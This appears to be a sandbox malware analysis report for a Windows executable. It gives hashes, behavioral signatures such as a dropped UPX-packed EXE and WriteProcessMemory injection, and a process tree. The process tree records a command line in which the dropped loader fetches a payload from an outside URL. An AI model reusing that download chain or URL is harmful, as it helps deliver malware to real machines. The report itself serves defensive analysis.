Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05/03/2024, 04:29
Behavioral task
behavioral1
Sample
b3c826c8e7de52b473258d54d67b528e.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b3c826c8e7de52b473258d54d67b528e.exe
Resource
win10v2004-20240226-en
General
-
Target
b3c826c8e7de52b473258d54d67b528e.exe
-
Size
83KB
-
MD5
b3c826c8e7de52b473258d54d67b528e
-
SHA1
dac2de8157e88c90257a255e8840fa661897e1a7
-
SHA256
5ec3a4f34c759cc44406d8402bcb640667c80da262e6811ff95402e2b48a0458
-
SHA512
0a99c1b7711877cad92fa538db9a09f5eb36ea5c28885eb6a841d21cc32e7681f4da1b6b91e0c201dc82479b0c8d99ed3516fc978a8ecf2d687ecc5c3bc3c4a3
-
SSDEEP
1536:0VmNBnskjNwF4mchK5RF12Ma0gRke7jbXOwzWSP1HdPI88i2nJy+wZm:rN9NdmxP8RkCHBvPpmi2ncbs
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1984 A2157-tmp.eXe -
Loads dropped DLL 3 IoCs
pid Process 1640 b3c826c8e7de52b473258d54d67b528e.exe 1640 b3c826c8e7de52b473258d54d67b528e.exe 1640 b3c826c8e7de52b473258d54d67b528e.exe -
resource yara_rule behavioral1/files/0x0007000000016cfe-4.dat upx behavioral1/memory/1984-17-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/1984-19-0x0000000000400000-0x0000000000424000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1640 wrote to memory of 1984 1640 b3c826c8e7de52b473258d54d67b528e.exe 28 PID 1640 wrote to memory of 1984 1640 b3c826c8e7de52b473258d54d67b528e.exe 28 PID 1640 wrote to memory of 1984 1640 b3c826c8e7de52b473258d54d67b528e.exe 28 PID 1640 wrote to memory of 1984 1640 b3c826c8e7de52b473258d54d67b528e.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\A2157-tmp.eXe"C:\Users\Admin\AppData\Local\Temp\A2157-tmp.eXe" http://downgosoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\A2157-tmpa"2⤵
- Executes dropped EXE
PID:1984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5a6ef8e1067dae3cf7537712443bf3b77
SHA1204b8a6402b415533540d0c2659c5722a21da8be
SHA2562917964e199063cb0cd0bced5d1f7846edcb810fe02fff8f0b1dd053746cf229
SHA5129662f18208b8a6c27a29e496b75d24ef9a910c20cd458fe8ea58458986253d3ff0a82e349cbfa804b52b3dd0913d995e737f740f48f1a16b8d2ff908ee9cc14a